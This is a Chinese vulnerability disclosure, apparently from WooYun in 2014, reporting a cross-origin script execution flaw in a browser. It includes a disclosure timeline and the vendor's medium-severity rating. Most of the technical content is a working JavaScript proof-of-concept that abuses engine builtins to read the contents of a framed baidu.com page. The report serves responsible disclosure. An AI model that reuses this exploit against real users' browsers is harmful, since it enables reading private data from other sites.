漏洞详情

披露状态:

2014-01-02: 细节已通知厂商并且等待厂商处理中
2014-01-05: 厂商已经确认,细节仅向厂商公开
2014-01-08: 细节向第三方安全合作伙伴开放
2014-01-15: 细节向核心白帽子及相关领域专家公开
2014-01-25: 细节向普通白帽子公开
2014-02-14: 细节向实习白帽子公开
2014-04-02: 细节向公众公开

简要描述:

对脚本执行限制不严格,导致跨域脚本执行

详细说明:

<body>
<script>
frame = document.body.appendChild(document.createElement("iframe"));
frame.src = "http://www.baidu.com/";

frame.onload = function() {
Function("}, (builtins = this), function() {");
originalInstantiate = builtins.Instantiate;
builtins.DefineOneShotAccessor(builtins, "Instantiate", function() {});
flag = 0;
template = null;
builtins.Instantiate = function(x, y) {
if (flag) {
doc = frame.contentWindow.document;
alert(doc.body.innerHTML);
flag = 0;
} else if (!template)
template = x;

return originalInstantiate(x, y);
};
document.implementation;
flag = 1;
builtins.ConfigureTemplateInstance(frame.contentWindow, template);
}
</script>
</body>

漏洞证明:

Screenshot_2014-01-02-14-16-07.png

修复方案:

对builtins对象执行脚本进行限制

版权声明:转载请注明来源 ali@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:5

确认时间:2014-01-05 15:06

厂商回复:

感谢提供

最新状态:

暂无


漏洞评价: